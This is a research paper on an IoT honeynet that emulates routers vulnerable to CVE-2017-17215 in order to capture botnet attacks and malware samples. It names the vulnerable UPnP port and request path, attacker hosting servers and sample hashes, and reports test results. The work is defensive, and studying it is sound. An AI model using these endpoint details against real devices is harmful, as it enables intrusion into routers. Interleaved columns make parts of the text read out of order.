This article has been accepted for publication in a future issue of this journal, but has not been
fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
An IoT Honeynet based on Multi-port Honeypots
for Capturing IoT attacks
Weizhe Zhang, Bin Zhang, Ying Zhou, Hui He, Zeyu Ding
Abstract—Internet of Things (IoT) devices are vulnerable
against attacks because of their limited network resources and
complex operating systems. Thus, honeypot is a good method of
capturing malicious requests and collecting malicious samples but
is rarely used on the IoT. Accordingly, this research implements
three kinds of honeypots to capture malicious behaviors. First , on
the basis of the CVE-2017-17215 vulnerability, we implement a
medium-high interaction honeypot that can simulate a specific se-
ries of router UPnP services. It has functions such as service simu-
lation, log recording, malicious sample download, and service self-
check. Second, given the limited details available for the simulated
UPnP service and to help the honeypot respond to unrecognizable
malicious requests, we use the actual IoT device firmware that
matches the vulnerability to build a high-interaction honeypot.
In addition, we investigate the most exposed SOAP service ports
and design corresponding multi-port honeypot to improve the
capacity of the honeynet, providing a hybrid service from a real
device and simulating honeypots. The Docker in the honeynet,
which reduces the volume of the honeypot and realizes the rapid
deployment of the honeynet, encapsulates all these honeypots.
Moreover, the honeynet control center is simultaneously designed
to distribute commands and transfer files to each physical node
in the honeynet. We implemented the proposed honeynet system
and deployed it in practice. We have successfully caught many
unknown malicious attacks excluded in the VT, which proved
the effectiveness of the proposed framework.
Index Terms—Internet of Things(IoT), honeypot, honeynet,
SOAP, Multiport
I. I NTRODUCTION
The Internet of Things (IoT) promotes smart and convenient
living. According to a survey [1], the number of IoT devices
has surpassed 10 billion. However, a huge security breach
happens in IoT. In 2018, a hacker organization infected more
than ten thousands of IOT devices with two IoT vulnerabilities
CVE-2017-17215 and CVE-2014-8361, and they even rented
Weizhe Zhang is with the School of Science and Technology, Harbin
Institute of Technology, Harbin, China. He is with Cyberspace Security
Research Center, Peng Cheng Laboratory, Shenzhen, China. (e-mail: wz-
zhang@hit.edu.cn).
Bin Zhang is with the Cyberspace Security Research Center, Peng Cheng
Laboratory, Shenzhen, China (bin.zhang@pcl.ac.cn).
Ying Zhou is with the Cyberspace Security Research Center, Peng Cheng
Laboratory, Shenzhen, China (e-mail: zhouy01@pcl.ac.cn).
Hui He is with the School of Science and Technology, Harbin Institute of
Technology, Harbin, China (e-mail: hehui@hit.edu.cn).
Zeyu Ding is with the School of Science and Technology, Harbin Institute
of Technology, Harbin, China (e-mail: dzydyx@gmail.com).
This work is supported by the Key Research and Development Program for
Guangdong Province 2019B010136001, the Peng Cheng Laboratory Project
of Guangdong Province PCL2018KP004 and PCL2018KP005. (corresponding
author: Weizhe Zhang)
Copyright (c) 2019 IEEE. Personal use of this material is permitted.
However, permission to use this material for any other purposes must be
obtained from the IEEE by sending a request to pubs-permissions@ieee.org.
2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
1
Distributed denial of service attack (DDoS) services on the
darknet. Another botnet named Hide’N Seek (HNS), infected
nearly a thousand IoT devices by injecting vulnerabilities
through several remote commands, which have been dis-
closed. The botnet named IoTroop, drew on part of Mirai
(a type of botnet) and launched three consecutive large-scale
DDoS attacks on financial institutions on January 28 in 2018.
Moreover, the MikroTik router has resulted in more than
200,000 devices digging without the user’s knowledge due to
its firmware vulnerabilities.
The vulnerabilities and number of IoT devices render IoT
attacks easier than traditional cyber-attacks. Existing IoT de-
vices are vulnerable to various physical attacks [22], [29],
such as position-based services [32], [33], [34]. Therefore,
studying lightweight IoT devices as well as communication
encryption schemes is crucial in ensuring their security [23].
The traditional sandbox and other security protection technolo-
gies [31] cannot be realized on the IoT devices because of
the limited resources of sensor devices and unreliable system
[24]. Consequently, the vulnerability of the system is easily
found via firmware analysis [25]. It is also vulnerable to side-
channel attacks due to the stability of its equipment location
[26]. The security threats to communication networks are
dominated by traditional cyber-attacks, namely, man-in-the-
middle attacks, data theft and replay, counterfeiting, and so
on. In addition, the UPnP, which is extensively used in IoT
devices, also brings many vulnerabilities. IoT devices can use
DHCP to automatically access the Internet and then use the
SSDP protocol to discover devices until the control device
completes the task [28].
To protect the IoT devices, monitoring the malicious behav-
ior of the IoT and promptly identifying threats are important.
We must analyze the malicious behavior, characteristics of
the data, as well as the characteristics of attacks [30], which
require us to obtain malicious samples of the IoT first.
Honeypot and honeynet are effective methods of capturing
malicious requests and collecting malicious behavior samples.
Honeypot induces the attack by arranging some hosts, network
services, or information, thereby capturing the attack behavior
and analyzing the tools and methods adopted by the attacker
and inferring the attack intention and motivation. The honeypot
can help the defense party clearly understand the security
threats and enhance the security protection capability of the
real system.
Yegneswaran et al. [15] proposed a situational awareness
model based on honeynet. They deployed a honeynet system
with MySQL database to save and analyze data, and the
BRONIDS is used for analysis. After six months of data
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
collection, the experimental results proved that the system
could detect botnet scanning and worm outbreaks.
Ma et al. [16] generated a highly personalized and predictive
blacklist for each network by sharing historical attackers,
which are captured by honeynets in each network. Accord-
ingly, different networks can collaboratively detect new attack-
ers because of the shared attacker information. The most likely
attacker in the future will be identified on the basis of their
attacker’s historical relevance. The defense strategy undergoes
a relatively active realization, and the experimental results
show that this method can produce an accurate blacklist.
Yongli et al. [17] proposed a new honeynet model, BRHNS
(based on Realm Honeynet), to solve the problem of non-
cooperation and weak real-time performance in honeynet.
BRHNS utilized the cooperation between Realms and shared
the new intrusion rules. It also updated the Intrusion Detection
Systems (IDS) rule-lib in real-time and improved the detection
efficiency of IDS. Accordingly, it effectively reduced the work-
load of honeynet and improved the efficiency of a honeynet.
Experimental results show that the BRHNS is much faster than
formal honeynets.
Honeypot captures many attacks that are difficult to handle
manually; therefore, some researchers proposed using data
mining techniques to analyze the recorded traffic and extract
useful information. Ghourabi et al. [18] provided a data
analysis tool on the basis of the clustering algorithm. The
main idea is to extract useful information from data captured
by the honeypot. The data are then clustered by the Density-
Based Spatial Clustering of Applications with Noise algorithm
to classify the captured packets. Then, a human expert verifies
the extracted suspicious packets. This solution is useful for
detecting novel routed attacks.
Huang et al. [19] indicated that positive interactions on
the honeynet could yield mature attack samples, but such
honeynet is highly expensive and poses high risks against the
development of the honeynet. Therefore, they applied Semi-
Markov Decision Process to describe an attacker’s random
transition and their stay time in the honeynet. Subsequently,
they weighed the rewards and risks. Adaptive long-term partic-
ipation policies have also been developed to demonstrate risk
avoidance, cost-effectiveness, and time efficiency. Numerical
results show that this adaptive interaction strategy can be used
to attract attackers quickly, with the capacity to obtain valuable
threat information in a long time with a low penetration rate.
However, the existing honeynet systems are designed for the
traditional Internet and are inappropriate for IoT systems. In
addition, owing to the changing form of the attack, we must
design a new honeypot to capture the attacks. To capture a
complete attack and avoid hackers from stopping due to long
periods of unresponsiveness, this research proposes a medium-
high interactive honeypot that uses the internal execution of
the vulnerability service as a black box and only returns
the output. Such proposition avoids the simulation of the
service, reduces the workload of the security personnel, and
improves the capability of the honeypot to interact with the
external network. Accordingly, the current study develops a
high-interaction honeypot running real IoT firmware. When
the high-interaction simulation honeypot fails to respond to
2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
2
the attacker’s request, the process is handed over to the real
honeypot and returns the real output. This research also de-
signed a multi-port honeypot, using a multi-threaded running
high-interaction honeypot. Then, any port can return the IoT
device configuration file according to the given fingerprint
information to simulate the real device service. The current
study proposed a novel architecture of honeypot and honeynet,
with the following contributions:
• We build interconnected and collaborative honeynet for
IoT network. The system simulates IoT device services
to monitor the security status of the IoT in real time. It
can discover and record malicious behaviors and collect
malicious samples of the IoT.
• In the proposed hybrid honeynet, we develop a medium-
high interactive honeypot with a high-interaction honey-
pot using real firmware services based on the popular
CVE-2017-17215 vulnerability. Moreover, we design a
multi-port interactive honeypot on the basis of the most
exposed SOAP port in 2018.
• We encapsulate the honeypot with Docker for the pro-
posed honeynet to ensure the security of the physical
machine and facilitate rapid deployment.
The rest of work is structured as follows. The next section
proposes related works. The method section depicts the pro-
posed honeypots and honeynet. Consecutively, we dissect the
conducted evaluation and activity observed with the honeynet
in the evaluation section. Finally, we conclude our work and
future outlook in the final section.
II. R ELATED WORK
A. Honeypot
Niels [3] proposed a classic honeypot framework Honeyd
; the latter can simulate real computers under the network
layer as shown in Fig.1. It consists of the traffic allocation
units, protocol processing units, and fingerprint matching units.
The traffic allocation units send the packet to an established
honeypot or a default route. The protocol processing units
can simulate the TCP, UDP and ICMP protocols, and so on.
The fingerprint matching units are used to fight fingerprint
identification tools, which can prevent hackers from discover-
ing the honeypot. The free IP address of the current network
can be regarded as the virtual address of the honeypot, and
many honeypots can be deployed on a single host because it
is lightweight.
Paul et al. [4] proposed another classic honeypot framework
called Nepentes. Nepenthes stimulates only parts of the pro-
tocol instead of a complete one, and it adopts a ShellCode
detection mechanism to discover injected malicious code. The
framework is replaced by Dionaea [5], which is implemented
via Python language to simulate vulnerability services and
capture malicious attacks.
Rist et al. [6] developed a Web honeypot called Glastopf,
which attempts to respond directly to the requestors, thus
avoiding the simulation of the service and reducing the work-
load of security personnel. Based on this work, the Glastopf
regards the CVE-2017-17215 vulnerability as a black box,
which shall only respond to the attacker. The limitations
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
External network
Honeyd
Network Port
Flow
Database Distribution
Fingerprint
Matching Unit
Unit
Protocol
Processing Unit
Fig. 1. The work flow of Honeyd
of this method prompt the current research to develop a
high interactive honeypot that operates real IoT firmware.
When medium-high-interaction honeypots cannot respond to
an attacker’s request, the process will be handed over to the
high-interaction honeypot.
In the field of IoT, scholars have begun to study the
honeynet system to collect malicious IoT behaviors. YMP
et al. [11] simulated the TELNET login process to create
an IoT honeypot that attracted TELNET attacks against IoT
devices with different CPU architectures. While collecting
data through the deployed honeynet, they discovered five
different malware families, the largest of which can infect up
to nine different IoT devices with different CPU architectures.
Anirudh et al. [12] designed a honeypot model as a bait for
the main server, thereby shifting the DoS attacks in the IoT
network and improving the performance of the IoT device.
Muhammad et al. [13] introduced an IoT honeypot framework
based on the UPnP protocol. They used device description files
to automate honeypots, and they can allow multiple instances
to be deployed on a single physical machine. We refer to this
architecture, select device files to make honeypots, and further
capture IoT malicious attacks. Hansen et al.[14] extended the
concept of the IoT honeypot and presented a honeynet system
with a hybrid of virtual and real devices. The system used
machine learning algorithms for traffic analysis and predicted
the opponent’s next activity.
Unlike the Internet which is based on the HTTP protocol,
IoT typically uses a lighter SOAP protocol for exchanging
information in a distributed computing environment. Dai et
al. [20] designed and implemented a SOAP-based transac-
tion management protocol (TMP), including supported oper-
ations, interface definitions for these operations, implementa-
tion structures, and processing of the protocol. SOAP-based
TMP can maximize the extensively used technologies such as
HTTP, XML, and SOAP, and thus can have extensive use.
Riedel et al. [21] transformed the lengthy parts binding with
SOAP to the semantics of a specific network platform. Taking
Radio Frequency Identification technology as an example, it
converts the semantics of Remote Procedure Call into a reader
query.
2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
3
B. Honeynet
Spitzner et al. [7] proposed honeynet due to the limitations
of a single virtual honeypot. The honeynet system is a net-
work that includes multiple honeypots as well as multiple
deployment nodes. It is a network that consists of behavior
recording, alarm and analysis, management communication,
and other mechanisms. It contains real systems to capture
further attacks, facilitating the understanding of hacker’s attack
methods and security incidents. Artail et al. [35] proposed a
hybrid honeynet system to improve the IDS, in which the low-
and high-interaction honeypots are all deployed to protect the
network.
Curran et al. [8] pointed out several major characteristics
of honeynet: (1) Defects and vulnerabilities in certain areas
as well as some un-security measures, which easily hold
honeynet vulnerable to attacks by hackers, frequently exist in
honeynet. (2) A honeynet is not a service network, thereby
rendering traffic monitoring in the honeynet system unsafe.
(3) The honeynet system should be capable of recording any
connections, requests, responses, services, logs, and so on,
for the security personnel to perform subsequent analysis.
(4) Every honeypot in the honeynet system is under strict
control; it can be traced and restored. (5) Security measures
between the honeynet system and the external network must
be in place to prevent malicious behaviors after the honeypot
is compromised. Moreover, Kevin et al. believed that the
honeynet system does not need to actively lure attacks, which
is conducive to ensuring the authenticity of the data obtained
by the honeypot.
For conventional honeynet, many scholars have conducted
research on intrusion detection and data analysis. Hu [9]
proposed an attack behavior analysis method based on an
attack graph. He used the attack graph for honeynet security
detection and introduced the key element of network topology;
he improved the clustering algorithm to classify the alarms.
In addition, he improved the DFS encoding technology and
migrated it to the field of directed graphs. Finally, Hu syn-
thesized the network and topology information to identify the
warning information. For data analysis in protected content,
for example, the position-based services and queries are highly
dependent on processing speed with content security. Sangaiah
et al. [34] used machine learning for roaming PBS users.
Medhane et al. [33] proposed parallel architecture in position
monitoring system, and position confidentiality conserving
algorithm is used to protect the content [32].
Agrawal et al. [10] proposed a method for monitoring rogue
wireless access based on a shadow honeynet as shown in Fig.2.
The concept of a shadow honeynet comes from a shadow
honeypot, which refers to a copy of the software or system
actually intended to be protected. The copy shares the internal
state with the subject. The framework consists of three parts,
namely, a filtering engine, an anomaly sensor, and a shadow
honeypot.
In the field of IoT, Oza et al. [36] implemented an authoriza-
tion mechanism in honeynet, thereby enabling them to solve
the issue of man-in-the-middle attacks in IoT. Ammar et al.
[37] proposed honeyIo3 model in ICS/SCADA systems, and
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
4

Protected system Container

warehouse Physical Host B
State rollback
Physical Host A Hardware
Protected service address space honeypot

Hardware Master A
honeypot controller Master B
Process Honeypot controller
General Service
state Shadow

CVE honeypot
SOAP multiport
CVE honeypot
honeypot

Intrusion Sensor
3K\VLFDO+RVW&

Filter Master Internet Master B SOAP multiport

Controller honeypot

External
network

Fig. 3. Composite honeynet system architecture

Fig. 2. Work principle of shadow Honeynet
the given commands to open and close the honeypot as well
as monitor the host system.
it provided the honeypot security tool with high availability;
As shown in Fig.3, the honeynet system deploys honeypots
it contained three IoT devices and is implemented using an
to multiple physical nodes, where each node supports both
office router and one public IP address.
single and multi-honeypot deployments and a master program
The honeynet module in this work focuses on the SOAP
to manage the honeypots on it. When the medium-high in-
protocol in the UPnP protocol stack of IoT, which exhibits
teraction honeypot cannot resolve the external request, it will
seriousness in terms of security. The CVE-2017-17215 vulner-
send a request to the master node, and the master node notifies
ability and the most exposed SOAP port in 2018 are used to
the high-interaction honeypot running the real firmware to
make honeypots. The latest IoT malicious samples since 2017
respond. The control nodes interact with the honeynet nodes
have been collected and rigorously screened. Therefore, this
so that the honeypots are combined by a single individual into
research has obtained highly authentic, timely, and valuable
a whole honeynet system.
data.
B. Medium-high Interactive Honeypot
III. M ETHODOLOGY In this subsection, we develop a honeypot for a router’s
To monitor malicious behaviors of the IoT, we proposed remote code injection vulnerabilities, which provide unsecured
a hybrid honeynet as shown in Fig.3, containing three kinds SOAP services for device upgrades. This vulnerability can
of honeypots. First, we designed a medium-high interactive result in unauthorized access and remote code injection. It
honeypot. Second, we designed a high-interactive honeypot can be utilized to execute arbitrary commands remotely by
that provides real service; hence, a mixed service of real sending a specially constructed request packet to the port
equipment and simulated honeypot is formed. Third, for the 37215 monitored by the UPnP service of routers.
most exposed SOAP ports in 2018, this research analyzes and
produces a multi-port honeypot. Finally, an IoT honeynet sys- TABLE I
CVE-2017-17215 VULNERABILITY I NFORMATION
tem is implemented by deploying these different honeypots to
multiple nodes. With control centers for command distribution Utilized Occupied Request path Infected Equip-
and file transfer, we complemented the honeynet system by vulnera- port ment Model
bility
Docker. B660
HG231f
CVE- /upnpdev.xml/
HG531sV1
2017- 37215 ctrlt/DeviceUpgrade-
A. Overall Architecture 17215 1
HG531V1
HG630
To establish a coordinated honeypot system and increase YAbox
the capacity of cluster deployment, this study designs a
control center. The script in the control center is used for First, we collect the IoT devices and their configuration
file distribution and command transfer, the honeypot response information affected by this vulnerability as shown in Table
message is obtained, and it is recorded in the output log. The I. We develop a honeypot on the basis of this vulnerability.
control script uses py thon multi-threaded design to connect to The structure of the proposed honeypot is as follows: the core
the remote host of the IP list using the paramiko library. The module of the honeypot, the honeypot Daemon module, the
script can realize the function of transferring files and can also Daemon process service, and the honeypot monitor, and other
use the Secure Shell key to connect to the host and execute modules.

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
5

The SOAP service module calls the handler defined in

Core Service the web service module and the make-server functions in
START
wsgiref.simple-server, and it opens the SOAP server at port
START
37215 to simulate the SOAP service with vulnerabilities of
real IoT equipment and attract hackers.
The handler function for the SOAP vulnerability is defined
REQUEST ATTACK
Log Server Soap Server in the web service module, and the constructed fake file is
RETURN RESPONSE
returned by wsgi. For the CVE-2017-17215 vulnerability, the
Hacker
injection code accesses port 37215 of the web service. Table
III shows the banner information. The send-log function is also
Samples Deal Webhook
defined in this section to send a request record packaged in
JSON format to log-server. In this part, the socket is used in the
Fig. 4. Relations between pot-core parts communication between web and log servers. The web server
waits for the message the log server returns. If it receives
an error message, it retransmits the same message. If the
The framework can ensure the stability of honeypot oper- number of retransmissions exceeds the limit, the log server
ation, and it can promptly discover and restart the honeypot is considered down.
when the honeypot service is abnormal. It can also supply The malicious sample processing module is responsible for
some log information, which cannot be recorded by the honey- downloading and processing malicious samples, where the
pot service, as well as assist in debugging and troubleshooting wget-virus-in-url function provides an external interface for
problems. calling the sample download function. In the function, the
1) Core Module of the Honeypot: The honeypot core mod- downloaded features are extracted by regular expressions.
ule is the core service of a honeypot, which provides simulated After extracting the download resource information, the
IoT devices and services with vulnerabilities. It consists of download-virus-by-requests function is called to download
the SOAP service module, web service module, log module, samples. The function first searches for the output directory
and malicious sample processing module. Fig.4 illustrates the and the sample name. If the sample name exists, the renaming-
relationship between them. duplicate-virus function is called to add the sample suffix
The core service module provides an external interface for to the sample to rename it. Then, the function calls the
the module, except for the honeypot core module. It monitors requests library for sample downloads. If the sample download
by opening the log and SOAP servers, and it sets the timer- is successful, the deep-analyze function is further called for
handle-fun function of the timer-call log module. The function an in-depth analysis, that is, the sample content is analyzed
recursively calls itself and detects the current time, ensuring to determine whether a ”large Trojan downloaded by small
that all logs are recorded daily in local directory. Trojan” situation occurs. This part also defines the clear-
The log module defines UDPHandler to monitor the front- duplicate-sample function to remove the deduplication of the
end SOAP service module, and it analyzes the request infor- sample, which calculates the hash value of the sample by
mation packaged in JSON format. Subsequently, the success calling the md5sum function.
information is returned. If a malicious sample download is
found in the request, the wget-virus-in-url function in the ma- TABLE III
licious sample processing module will be called to download CVE-2017-17215 V ULNERABILITY BANNER F ORMAT
the sample. This file also provides the interface function of
Field Name Meaning Value
opening log server and timing output log for core service Content- Return Content Length 259
module. Table II presents the logs defined as GET, POST and Length
others, and the corresponding format. Date Time Mon, 26 Nov 2018
13:05:09 GMT
EXT JS Framework Empty
TABLE II Content-Type Filed Type text/xml; charset=”utf-
L OG F ORMAT 8”
Server Device Type Linux UPnP/1.0
Field Name Meaning Value Huawei-ATP-IGD
log type Malicious Request Type get, post, other WWW- Abstract Authentication ...nonce=“2da490f624b01
time Request Time time.ctime () Authenticate 151f1feabad77c1a122”,
timestamp UTC Time stamp time.time () qop=“auth”,
src ip Request Source IP JSON Packet Analysis algorithm=“MD5”
sensor ip Honeypot External IP requests.get return data SOAP Service Messages this is end
(“http://jsonip.com”).json
()[“ip”]
socket.gethostbyname The SoapXML folder provides a SOAP device information
(socket.gethostname ()) modeled after the vulnerable router. It includes the device
des port Destination Port 37215 type, device model, device URL, Universally Unique Identifier,
protocol Protocol HTTP
path info Request Path JSON Packet Analysis service list, service address, serial number, and so on. This
query string Get Query String JSON Packet Analysis file is used to respond to SOAP service scans for port 37215,
user agent Requester banner user agent returning real device configuration information.

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
6

The functions of the above parts work together to form C. High Interactive Honeypot
the core of honeypot, complete the basic functions of the The medium-high interactive honeypot described in the
honeypot, and simulate the real IoT devices and services. previous section simulates the SOAP protocol based on wsgi.
2) Honeypot Daemon: This class defines a base class However, when the simulation protocol fails to process re-
Daemon to open, close, restart, and initialize. It also provides quests, an attacker is likely to interrupt the connection be-
the external interface to control honeypot. cause the expected response is not received. Consequently,
Considering that the Daemon class is out of the terminal, the honeypot fails to capture the subsequent injection code
the standard information flow is redirected to an empty file. and malicious sample. Therefore, a high interactive honeypot
The default value of pidfile attribute is “/tmp/tmp.pid”, which is developed to handle requests using a completely realis-
saves the process number of the current process. The system tic exploitable IoT firmware to handle requests that cannot
can determine if the process already exists to ensure singleton be processed by mid-high interactive emulation honeypots.
mode. Moreover, running the captured malicious samples is possible
The function daemonize is used to initialize the Daemon because of the integrity of its services.
instance. First, whether it already exists by pidfile is deter- The qemu environment is used to assemble the kernel file
mined; then, the buffer is flushed, and the standard stream vmlinux-2.6.32-5-4kc-malta and disk image debian-squeeze-
is discarded. Finally, the pidfile is guaranteed removal at the mips-standard.qcow2. After booting successfully, the change
end of the process through the atexit.register and signal.signal root command is used to switch the root directory and run the
functions. The static function throws SystemExit exception. UPnP and mic services. It provides the same SOAP service
The start function calls the daemonize function to initialize, as a real-world vulnerability IoT device. The device firmware-
catches the abnormal operation, and outputs an error message. based SOAP service honeypot can be implemented by adding
The stop function takes a process number from a pidfile and the above request record and sample download module to the
kills it. The restart function continuously calls stop and start system.
functions to restart.
3) Daemon Service: The class MyDaemon is defined in D. Multi-port Honeypot
the Daemon module, which inherits the Daemon class in scar- SOAP vulnerability involves UPnP’s device architecture,
library. Then, it starts the honeypot core service when the SOAP service, and HTTP protocol. Attackers use multiple
instance is in operation. In the main function, an instance of ports to attack. To collect these samples, we obtain the banner
the class MyDaemon is created. The start of the honeypot information of several IoT devices affected by the vulnerability
daemon and the core of the honeypot are controlled by the through the collection of IoT device information. The latter
corresponding functions of the instance. The class PotCore is is used to match the device type and select the response
also defined to provide an interface to the daemon externally. content of the malicious request. Table IV describes the device
The main function is called by calling the subprocess.Popen information.
function. That is, the external instance of the class MyDaemon
TABLE IV
is not directly called, but the instance of PotCore is called. The L OG F ORMAT
instance of PotCore calls the instance of MyDaemon through
its own method to implement the indirect call. Port Banner Device Files
Number
4) Honeypot Monitor: The Honeypot Monitor module calls 2048 Net-OS 5.xx UPnP/1.0 gatedesc.xml
the timer-handle-web-detect-fun function to check the honey- 3183 Net-OS 5.xx UPnP/1.0 gatedesc.xml
5000 nginx desc-DSM-eth0.xml
pot function. This function regularly accesses the honeypot 5000 Linux/2.6.12 UPnP/1.0 Public-UPNP-
simulation service, detects its running state, determines ex- NETGEAR-UPNP/1.0 gatedesc.xml
ceptions such as timeouts and connection errors, and calls the 5000 1.11.0-R UPnP/1.0 MiniUP- rootDesc.xml
nPd/1.4
PotCore class object to restart honeypot when an exception 5500 Tenda UPnP/1.0 rootDesc.xml
occurs. The start-service interface is also provided for external miniupnpd/1.0
calls. 5555 RomPager/4.07 UPnP/1.0 DeviceDescription.xml
35510 Net-OS 5.xx UPnP/1.0 gatedesc.xml
5) Other Modules: The configuration module is the hon- 49152 Linux/2.6.32.11, UPnP/1.0, gatedesc.xml
eypot configuration file, which defines some parameters and Portable SDK for UPnP
reduces the workload of secondary development. Specifically, devices/1.6.6
52869 ipos/7.0 UPnP/1.0 TL- igd.xml
it includes honeypot name, log output directory, honeypot core, WR841N/11.0
honeypot self-check delay, and self-check cycle. 52869 miniupnpd/1.5 UPnP/1.5 picsdesc.xml
52881 OS 1.0 UPnP/1.0 Realtek/V1.3 simplecfg.xml
main.py is the entry of the entire honeypot framework. It 54147 Net-OS 5.xx UPnP/1.0 gatedesc.xml
calls the start method of the PotCore class instance to open 55567 Net-OS 5.xx UPnP/1.0 gatedesc.xml
the daemon and then calls the self-check.start-service of pot-
monitor function to start the SOAP service self-check. To implement the multi-port honeypot, this research adopts
Tc.sh calls the tc tool to limit traffic and prevent the the threading module to achieve multi-threaded operation.
honeypot from being compromised due to DDoS attacks. The Then, any port can return the IoT device configuration file
main.py is called in this research and is the outermost entrance according to the given fingerprint information to simulate the
of the honeypot. real device service.

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
7

E. Honeypot Docker Packaging B. Evaluation of Honeypots

To facilitate the rapid deployment of the transplant and Table VI presents the functional test of the honeypot. The
to prevent malicious behavior after the honeypot is broken, functional test demonstrates that the IoT honeypot can per-
the honeypot must be virtualized and transplanted. Then, the fectly simulate and implement the real IoT device services and
honeypot is packaged into an easily usable and deployable can handle unknown requests. It also implements self-check
black box. and restart functions with certain tolerance and robustness, and
Docker is a technology for packaging applications. The it provides a reliable underlying environment for the system.
main components are images, containers, and warehouses. An We can conclude from Table VI that the honeypot is running
image is a file that contains the basic contents of a container normally after opening and can provide a simulated SOAP
that can be recognized by the Docker engine. An image service for IoT devices. After killing the honeypot core service
can contain the following that the developer needs: operating with the kill command, the honeypot Daemon will find that the
system and specific environment, applications, and so on. The program runs abnormally and automatically restarts the core
container is an image after running. The repository is used during regular self-check.
to save the image. Considering rapid deployment, the image
must be streamlined as follows: TABLE VI
H ONEYPOT T EST I NSTANCE
1. Optimize the basic image. ubuntu 16.04 is adopted in
the basic image of a honeypot, and it also integrates some Instance Descrip- Expected Results Actual
packages simultaneously needed in the Python 3.6, preventing tion Results
Scan device re- Returns Banner Information of IoT Normal
the image from being downloaded at a reduced rate during sponse header in- Device Attackers Get the Same Re-
packaging. formation sponse as real IoT Devices
2. Concatenate DockerFile instructions. Multiple commands Wget Requested Honeypot Records Requests, Returns Normal
Device File Request Files and Saves Logs Re-
are concatenated into one RUN command, the number of questor downloads device file to local
image layers is reduced, and unnecessary components are Request a Honeypot Records Request Content Normal
removed to reduce space. resource path and Responds that Resource does not
that does not exist Exist
3. Optimize business. The image cache is maximized, a Use POC Injec- Honeypot Records Injection Code Normal
fixed machine is used for Docker builds, and the constant large tion Directive and Returns Response Prompt for
dependent libraries are separated from the frequently modified Attacker Gets Device Upgrade Suc-
cessful
own code. Download Instruc- Honeypot Successfully Analysis Normal
4. Optimize run command. Suggested dependencies are tions with POC Download Instructions and
avoided when executing the apt command. Injection Sample Downloads Malicious Samples
Prompt for Attacker Gets Device
During the rapid deployment of honeynet, the master node Upgrade Successful
issues command to the master program of each physical Injecting Honeypots with POC Code Firmware Normal
Firmware Successfully Executes Malicious In-
host, and each physical host connects to the remote image structions
warehouse to download the required honeypot image and wget request Honeypot Returns Different Banner Normal
subsequently run them. A hybrid IoT honeypot with multi- multi-port based on Requested Path and Port
honeypot device Number Attackers Get the Same Re-
nodes and multi-honeypots is constructed through the commu- file sponse as real IoT Devices
nication between the master node and each physical machine, Kill a process with The Honeypot self-check Program Normal
the communication between each physical machine, and the the kill command Detects Service Availability at Reg-
ular Intervals. Honeypot Self-check
mutual cooperation between the honeypots inside the physical Procedure Finds Process Terminated
machines. and Restarts it Automatically

IV. E VALUATION C. Evaluation of Honeynet

A. Configuration Two honeypots deployed in 138.68.166.134 in the USA
In this paper, the control center and program are running and 159.89.42.105 in Canada operate steadily and collect
on the personal computer, and the proposed honeynet is many attacks over a week between November 30, 2018 and
deployed on the cloud. Table V presents the specific software December 6, 2018 as shown in Table VII.
environments and configurations.
TABLE VII
S AMPLE S ERVER I NFORMATION
TABLE V
T EST E NVIRONMENT Field Name IP Location Operators
46.17.47.82 Moscow, Russia justhost.ru
Software type Configuration 46.183.218.247 Latvia dataclub.eu
HoneyWeb Host Operating System Ubuntu 18.04 68.183.49.185 New York, New York, USA digitalocean.com
Honeynet host-dependent environment Docker, qemu 91.236.239.91 Hauts de France, Valenciennes, firstheberg.com
Project Development Language Python, vue, node, shell France
Database MySQL, heidisql 128.199.137.201 Singapore digitalocean.com
Test Host Win10 professional 176.32.33.123 Moscow, Russia justhost.ru
Browser Google chrome 185.10.68.127 Bucharest, Romania flokinet.is

2327-4662 (c) 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
This article has been accepted for publication in a future issue of this journal, but has not been fully edited. Content may change prior to final publication. Citation information: DOI 10.1109/JIOT.2019.2956173, IEEE Internet of
Things Journal
8

to the IoT with high scientific and engineering value. Table

Russia VIII presents the specific information of the malicious sample.
India
Japan
France TABLE VIII
USA M ALICIOUS I OT S AMPLES C APTURED BY H ONEYPOT
UK
Sample MD5 Hash marked by
Name VT
NEixu378 3ead70762dea459c9eaa890ad3fb5c67 Yes
ixa 0995b3d7b7de8b6b2c3fd68dd0a69318 No
gvv 65751698335401d479c646a4e2a4fafb No
mips.bushido 7556a023c0db73c72ea2e1e7355a30b9 No

V. C ONCLUSION
Fig. 5. Analysis for captured scan behaviors On the basis of the CVE-2017-17215 vulnerability exploited
by large-scale botnets, we develop a medium-high interaction
honeypot, which can implement SOAP service interaction, log
Russia
India
recording, sample download, and service self-check. For the
Japan request that the honeypot could not be processed, a high-
